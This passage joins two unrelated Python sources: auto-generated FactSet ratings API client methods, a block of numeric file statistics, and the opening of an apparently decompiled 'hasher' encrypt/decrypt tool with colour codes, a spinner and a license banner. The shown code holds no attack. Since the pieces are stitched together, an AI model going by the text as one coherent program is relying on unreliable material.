frequency (str): Controls the frequency of the data returned. * **D** = Daily * **W** = Weekly, based on the last day of the week of the start date. * **AM** = Monthly, based on the start date (e.g., if the start date is June 16, data is displayed for June 16, May 16, April 16 etc.). * **AQ** = Quarterly, based on the start date. * **AY** = Actual Annual, based on the start date. . [optional] if omitted the server will use the default value of "D"
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ConsensusRatingsResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['ids'] = \
ids
return self.get_consensus_ratings_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_async(
self,
ids,
**kwargs
) -> "ApplyResult[ConsensusRatingsResponse]":
"""Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell. # noqa: E501
Returns ratings from the FactSet Estimates database for current and historical for an individual security using rolling fiscal dates as of a specific date. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
ids ([str]): Security or Entity identifiers. FactSet Identifiers, tickers, CUSIP and SEDOL are accepted input. <p>***ids limit** = 3000 per request*</p> * Make Note - id limit of 3000 for defaults, otherwise the service is limited to a 30 second duration. This can be reached when increasing total number of metrics requested and depth of history. *
Keyword Args:
start_date (str): Start date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
end_date (str): End date for point in time of estimates expressed in YYYY-MM-DD format.. [optional]
frequency (str): Controls the frequency of the data returned. * **D** = Daily * **W** = Weekly, based on the last day of the week of the start date. * **AM** = Monthly, based on the start date (e.g., if the start date is June 16, data is displayed for June 16, May 16, April 16 etc.). * **AQ** = Quarterly, based on the start date. * **AY** = Actual Annual, based on the start date. . [optional] if omitted the server will use the default value of "D"
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[ConsensusRatingsResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['ids'] = \
ids
return self.get_consensus_ratings_endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_with_http_info_async(
        self,
        ids,
        **kwargs
) -> "ApplyResult[typing.Tuple[ConsensusRatingsResponse, int, typing.MutableMapping]]":
    """Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Returns ratings from the FactSet Estimates database, current and
    historical, for an individual security using rolling fiscal dates as of
    a specific date.  Asynchronous variant: the result is an ApplyResult
    wrapping (http data, http status code, response headers).

    Args:
        ids ([str]): Security or Entity identifiers. FactSet Identifiers,
            tickers, CUSIP and SEDOL are accepted. Limit: 3000 ids per
            request for defaults; otherwise the service is limited to a
            30 second duration.

    Keyword Args:
        start_date (str): Point-in-time start date, YYYY-MM-DD. [optional]
        end_date (str): Point-in-time end date, YYYY-MM-DD. [optional]
        frequency (str): Frequency of the returned data — D (daily),
            W (weekly), AM (monthly), AQ (quarterly) or AY (annual),
            anchored on the start date. [optional; server default "D"]
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ApplyResult[(ConsensusRatingsResponse, int, typing.Dict)]
    """
    # Async request, full (data, status, headers) tuple requested.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs['ids'] = ids
    endpoint = self.get_consensus_ratings_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_for_list(
        self,
        consensus_ratings_request,
        **kwargs
) -> ConsensusRatingsResponse:
    """Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Returns ratings from the FactSet Estimates database, current and
    historical, for an individual security using rolling fiscal dates as of
    a specific date.  Synchronous variant: returns the http data only.

    Args:
        consensus_ratings_request (ConsensusRatingsRequest): Request object
            for Estimate Data Items.

    Keyword Args:
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ConsensusRatingsResponse: the response object.
    """
    # Synchronous request, http data only.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs['consensus_ratings_request'] = consensus_ratings_request
    endpoint = self.get_consensus_ratings_for_list_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_for_list_with_http_info(
        self,
        consensus_ratings_request,
        **kwargs
) -> typing.Tuple[ConsensusRatingsResponse, int, typing.MutableMapping]:
    """Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Returns ratings from the FactSet Estimates database, current and
    historical, for an individual security using rolling fiscal dates as of
    a specific date.  Synchronous variant: returns (http data, http status
    code, response-header dict).

    Args:
        consensus_ratings_request (ConsensusRatingsRequest): Request object
            for Estimate Data Items.

    Keyword Args:
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ConsensusRatingsResponse, int, dict: response object, HTTP status
        code, and dictionary of the response headers.
    """
    # Synchronous request, full (data, status, headers) tuple requested.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs['consensus_ratings_request'] = consensus_ratings_request
    endpoint = self.get_consensus_ratings_for_list_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_for_list_async(
        self,
        consensus_ratings_request,
        **kwargs
) -> "ApplyResult[ConsensusRatingsResponse]":
    """Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Returns ratings from the FactSet Estimates database, current and
    historical, for an individual security using rolling fiscal dates as of
    a specific date.  Asynchronous variant: the result is an ApplyResult
    wrapping the http data only.

    Args:
        consensus_ratings_request (ConsensusRatingsRequest): Request object
            for Estimate Data Items.

    Keyword Args:
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ApplyResult[ConsensusRatingsResponse]
    """
    # Async request, http data only.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs['consensus_ratings_request'] = consensus_ratings_request
    endpoint = self.get_consensus_ratings_for_list_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_consensus_ratings_for_list_with_http_info_async(
        self,
        consensus_ratings_request,
        **kwargs
) -> "ApplyResult[typing.Tuple[ConsensusRatingsResponse, int, typing.MutableMapping]]":
    """Ratings consensus estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Returns ratings from the FactSet Estimates database, current and
    historical, for an individual security using rolling fiscal dates as of
    a specific date.  Asynchronous variant: the result is an ApplyResult
    wrapping (http data, http status code, response headers).

    Args:
        consensus_ratings_request (ConsensusRatingsRequest): Request object
            for Estimate Data Items.

    Keyword Args:
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ApplyResult[(ConsensusRatingsResponse, int, typing.Dict)]
    """
    # Async request, full (data, status, headers) tuple requested.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs['consensus_ratings_request'] = consensus_ratings_request
    endpoint = self.get_consensus_ratings_for_list_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_detail_ratings(
        self,
        ids,
        **kwargs
) -> DetailRatingsResponse:
    """Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Retrieves the Broker Level ratings for the requested id and date range.
    By default the service returns the range of estimateDates within the
    latest company reporting period; widening `startDate`/`endDate` adds
    full historical reporting periods and all ratings estimateDates per
    broker.  Synchronous variant: returns the http data only.

    Args:
        ids ([str]): Security or Entity identifiers. FactSet Identifiers,
            tickers, CUSIP and SEDOL are accepted. Limit: 3000 ids per
            request for defaults; otherwise the service is limited to a
            30 second duration.

    Keyword Args:
        start_date (str): Point-in-time start date, YYYY-MM-DD. [optional]
        end_date (str): Point-in-time end date, YYYY-MM-DD. [optional]
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        DetailRatingsResponse: the response object.
    """
    # Synchronous request, http data only.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs['ids'] = ids
    endpoint = self.get_detail_ratings_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_with_http_info(
        self,
        ids,
        **kwargs
) -> typing.Tuple[DetailRatingsResponse, int, typing.MutableMapping]:
    """Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Retrieves the Broker Level ratings for the requested id and date range.
    By default the service returns the range of estimateDates within the
    latest company reporting period; widening `startDate`/`endDate` adds
    full historical reporting periods and all ratings estimateDates per
    broker.  Synchronous variant: returns (http data, http status code,
    response-header dict).

    Args:
        ids ([str]): Security or Entity identifiers. FactSet Identifiers,
            tickers, CUSIP and SEDOL are accepted. Limit: 3000 ids per
            request for defaults; otherwise the service is limited to a
            30 second duration.

    Keyword Args:
        start_date (str): Point-in-time start date, YYYY-MM-DD. [optional]
        end_date (str): Point-in-time end date, YYYY-MM-DD. [optional]
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        DetailRatingsResponse, int, dict: response object, HTTP status code,
        and dictionary of the response headers.
    """
    # Synchronous request, full (data, status, headers) tuple requested.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs['ids'] = ids
    endpoint = self.get_detail_ratings_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_async(
        self,
        ids,
        **kwargs
) -> "ApplyResult[DetailRatingsResponse]":
    """Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Retrieves the Broker Level ratings for the requested id and date range.
    By default the service returns the range of estimateDates within the
    latest company reporting period; widening `startDate`/`endDate` adds
    full historical reporting periods and all ratings estimateDates per
    broker.  Asynchronous variant: the result is an ApplyResult wrapping
    the http data only.

    Args:
        ids ([str]): Security or Entity identifiers. FactSet Identifiers,
            tickers, CUSIP and SEDOL are accepted. Limit: 3000 ids per
            request for defaults; otherwise the service is limited to a
            30 second duration.

    Keyword Args:
        start_date (str): Point-in-time start date, YYYY-MM-DD. [optional]
        end_date (str): Point-in-time end date, YYYY-MM-DD. [optional]
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ApplyResult[DetailRatingsResponse]
    """
    # Async request, http data only.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs['ids'] = ids
    endpoint = self.get_detail_ratings_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_with_http_info_async(
        self,
        ids,
        **kwargs
) -> "ApplyResult[typing.Tuple[DetailRatingsResponse, int, typing.MutableMapping]]":
    """Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Retrieves the Broker Level ratings for the requested id and date range.
    By default the service returns the range of estimateDates within the
    latest company reporting period; widening `startDate`/`endDate` adds
    full historical reporting periods and all ratings estimateDates per
    broker.  Asynchronous variant: the result is an ApplyResult wrapping
    (http data, http status code, response headers).

    Args:
        ids ([str]): Security or Entity identifiers. FactSet Identifiers,
            tickers, CUSIP and SEDOL are accepted. Limit: 3000 ids per
            request for defaults; otherwise the service is limited to a
            30 second duration.

    Keyword Args:
        start_date (str): Point-in-time start date, YYYY-MM-DD. [optional]
        end_date (str): Point-in-time end date, YYYY-MM-DD. [optional]
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ApplyResult[(DetailRatingsResponse, int, typing.Dict)]
    """
    # Async request, full (data, status, headers) tuple requested.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs['ids'] = ids
    endpoint = self.get_detail_ratings_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_for_list(
        self,
        detail_ratings_request,
        **kwargs
) -> DetailRatingsResponse:
    """Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Retrieves the Broker Level ratings for the requested id and date range.
    By default the service returns the range of estimateDates within the
    latest company reporting period; widening `startDate`/`endDate` adds
    full historical reporting periods and all ratings estimateDates per
    broker.  Synchronous variant: returns the http data only.

    Args:
        detail_ratings_request (DetailRatingsRequest): Request object for
            Detail Ratings Data Items.

    Keyword Args:
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        DetailRatingsResponse: the response object.
    """
    # Synchronous request, http data only.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs['detail_ratings_request'] = detail_ratings_request
    endpoint = self.get_detail_ratings_for_list_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_for_list_with_http_info(
        self,
        detail_ratings_request,
        **kwargs
) -> typing.Tuple[DetailRatingsResponse, int, typing.MutableMapping]:
    """Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Retrieves the Broker Level ratings for the requested id and date range.
    By default the service returns the range of estimateDates within the
    latest company reporting period; widening `startDate`/`endDate` adds
    full historical reporting periods and all ratings estimateDates per
    broker.  Synchronous variant: returns (http data, http status code,
    response-header dict).

    Args:
        detail_ratings_request (DetailRatingsRequest): Request object for
            Detail Ratings Data Items.

    Keyword Args:
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        DetailRatingsResponse, int, dict: response object, HTTP status code,
        and dictionary of the response headers.
    """
    # Synchronous request, full (data, status, headers) tuple requested.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs['detail_ratings_request'] = detail_ratings_request
    endpoint = self.get_detail_ratings_for_list_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_for_list_async(
        self,
        detail_ratings_request,
        **kwargs
) -> "ApplyResult[DetailRatingsResponse]":
    """Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Retrieves the Broker Level ratings for the requested id and date range.
    By default the service returns the range of estimateDates within the
    latest company reporting period; widening `startDate`/`endDate` adds
    full historical reporting periods and all ratings estimateDates per
    broker.  Asynchronous variant: the result is an ApplyResult wrapping
    the http data only.

    Args:
        detail_ratings_request (DetailRatingsRequest): Request object for
            Detail Ratings Data Items.

    Keyword Args:
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ApplyResult[DetailRatingsResponse]
    """
    # Async request, http data only.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs['detail_ratings_request'] = detail_ratings_request
    endpoint = self.get_detail_ratings_for_list_endpoint
    return endpoint.call_with_http_info(**kwargs)
def get_detail_ratings_for_list_with_http_info_async(
        self,
        detail_ratings_request,
        **kwargs
) -> "ApplyResult[typing.Tuple[DetailRatingsResponse, int, typing.MutableMapping]]":
    """Broker Detail estimates to fetch Buy, Overweight, Hold, Underweight, and Sell.  # noqa: E501

    Retrieves the Broker Level ratings for the requested id and date range.
    By default the service returns the range of estimateDates within the
    latest company reporting period; widening `startDate`/`endDate` adds
    full historical reporting periods and all ratings estimateDates per
    broker.  Asynchronous variant: the result is an ApplyResult wrapping
    (http data, http status code, response headers).

    Args:
        detail_ratings_request (DetailRatingsRequest): Request object for
            Detail Ratings Data Items.

    Keyword Args:
        _preload_content (bool): if False, return the raw urllib3.HTTPResponse. Default True.
        _request_timeout (int/float/tuple): total timeout or (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server. Default True.
        _check_return_type (bool): type-check data received. Default True.
        _spec_property_naming (bool): input keys use serialized (OpenAPI) names. Default False.
        _content_type (str/None): force the body content-type. Default: predicted.
        _host_index (int/None): server index to use. Default: from configuration.

    Returns:
        ApplyResult[(DetailRatingsResponse, int, typing.Dict)]
    """
    # Async request, full (data, status, headers) tuple requested.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs['detail_ratings_request'] = detail_ratings_request
    endpoint = self.get_detail_ratings_for_list_endpoint
    return endpoint.call_with_http_info(**kwargs)
| 54.183394
| 859
| 0.609969
| 6,930
| 59,385
| 5.104329
| 0.054545
| 0.024425
| 0.017641
| 0.017188
| 0.93642
| 0.930653
| 0.929975
| 0.921663
| 0.919006
| 0.917819
| 0
| 0.008613
| 0.325486
| 59,385
| 1,095
| 860
| 54.232877
| 0.874476
| 0.638596
| 0
| 0.713647
| 0
| 0
| 0.161264
| 0.069424
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040268
| false
| 0
| 0.026846
| 0
| 0.105145
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a96f7ee54d1a9bebecdccdb69a1793ea816cce1
| 40,087
|
py
|
Python
|
Hasher/hasher_dec.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
Hasher/hasher_dec.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
Hasher/hasher_dec.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
# Decompiled At : Fri Apr 10 19:36:05 WIB 2020
# Python bytecode 2.7
import requests, os, random, sys, time, subprocess as sp
from bs4 import BeautifulSoup as bs
# ANSI escape sequences for terminal colors.
# Two-character names: letter = color (G green, C cyan, P purple, W white,
# B blue, R red, Y yellow), digit = attribute (0 normal, 1 bold).
G0 = '\x1b[0;32m'
G1 = '\x1b[1;32m'
C0 = '\x1b[0;36m'
C1 = '\x1b[1;36m'
P0 = '\x1b[0;35m'
P1 = '\x1b[1;35m'
W0 = '\x1b[0;37m'
W1 = '\x1b[1;37m'
B0 = '\x1b[0;34m'
B1 = '\x1b[1;34m'
R0 = '\x1b[0;31m'
R1 = '\x1b[1;31m'
Y1 = '\x1b[1;33m'
Y0 = '\x1b[0;33m'
BG = '\x1b[1;97;41m'  # bright white on red background
RE = '\x1b[0m'  # reset all attributes
# The same colors under Indonesian names (hijau=green, kuning=yellow,
# ungu=purple, putih=white, merah=red, biru=blue) used in menu strings.
hijau = '\x1b[32m'
cyan = '\x1b[36m'
kuning = '\x1b[33;1m'
ungu = '\x1b[35m'
putih = '\x1b[37m'
merah = '\x1b[31m'
biru = '\x1b[34m'
# Prompt template shown by every eN() menu: 1 = Encrypt, 2 = Decrypt.
tip = '%s [%sPilih Tipenya%s]\n%s [%s1%s]%s Encrypt\n%s [%s2%s]%s Decrypt\n' % (putih, cyan, putih, putih, merah, putih, hijau, putih, merah, putih, hijau)
def spin():
    """Render a short '\\|/-' spinner with a loading message (~1 second total)."""
    try:
        frames = '\\|/-'
        count = len(frames)
        for step in range(10):
            time.sleep(0.1)
            frame = frames[step % count]
            sys.stdout.write('\r\x1b[1;32m[\x1b[1;33m' + frame + '\x1b[1;32m]\x1b[0;37m Loading please wait...')
            sys.stdout.flush()
    except:
        # Original swallows any interruption (e.g. Ctrl-C) and exits quietly.
        exit()
def ketik(teks):
    """Print *teks* followed by a newline with a typewriter effect (1 ms/char)."""
    out = sys.stdout
    for ch in teks + '\n':
        out.write(ch)
        out.flush()
        time.sleep(0.001)
def load(word):
    """Animate *word* with a rotating frame suffix (4 frames x 6 cycles, 0.2 s each)."""
    frames = ['/', '-', '\xe2\x95\xb2', '|']
    # Six full passes over the frames -- identical sequence to the original
    # nested range(6) x range(len(frames)) loops.
    for frame in frames * 6:
        sys.stdout.write(('\r{}{}').format(str(word), frame))
        time.sleep(0.2)
        sys.stdout.flush()
# License-screen banner (Indonesian): says the license is free and that
# pressing A opens a chat with the admin.
licen = '\n %s[%sLICENSE HASHER%s]%sv0.1\n %s|>%s Tenang Licensenya Gratis kok %s<|\n %s|> %s[%sA%s] %sTEKAN A UNTUK CHAT ADMIN %s<|\n' % (merah, putih, merah, kuning, merah, cyan, merah, merah, putih, hijau, putih, cyan, merah)
def metu():
    """Print the exit banner and terminate the process with status 1."""
    print '%s[%sx%s] %sExiting Program' % (W1, R1, W1, R0)
    exit(1)
def main1():
    """Print the colored ASCII-art HASHER banner plus author/date/purpose lines."""
    # The escape blobs below are pre-rendered UTF-8 box-drawing art with
    # embedded ANSI color codes; they must not be reformatted.
    print '\x1b[37m==============================================='
    print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97'
    print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97'
    print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97 \x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x9d'
